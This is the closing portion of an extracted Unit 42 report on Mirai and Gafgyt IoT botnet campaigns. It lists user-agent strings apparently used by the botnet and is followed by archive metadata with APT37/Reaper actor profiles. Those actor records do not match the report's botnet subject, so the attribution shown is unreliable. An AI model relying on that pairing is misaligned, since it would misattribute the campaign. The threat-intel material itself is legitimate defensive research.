(KHTML, like Gecko) Version/4.0\r\nSafari/530.17 Skyfire/2.0\r\nSonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1\r\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)\r\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39\r\nSafari/525.19\r\nMozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile\r\nSafari/537.36\r\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r\nMozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62\r\nOpera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01\r\nOpera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16\r\nBlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100\r\nBlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1\r\nDoris/1.15 [en] (Symbian)\r\nBunjalloo/0.7.6(Nintendo DS;U;en)\r\nPSP (PlayStation Portable); 2.00\r\nMozilla/4.0 (PSP (PlayStation Portable); 2.00)\r\nwii libnup/1.0\r\nMozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2\r\nMozilla/5.0 (PLAYSTATION 3; 3.55)\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 12 of 13\n\nMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7\r\nMozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)\r\nMozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2\r\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911\r\nMozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201\r\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4\r\nMozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)\r\nMozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1\r\nMozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0\r\nSource: https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" ], "report_names": [ "unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434714, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/139ee73a0b867fe8723fe4f204f997585d3c4379.pdf", "text": "https://archive.orkl.eu/139ee73a0b867fe8723fe4f204f997585d3c4379.txt", "img": "https://archive.orkl.eu/139ee73a0b867fe8723fe4f204f997585d3c4379.jpg" } }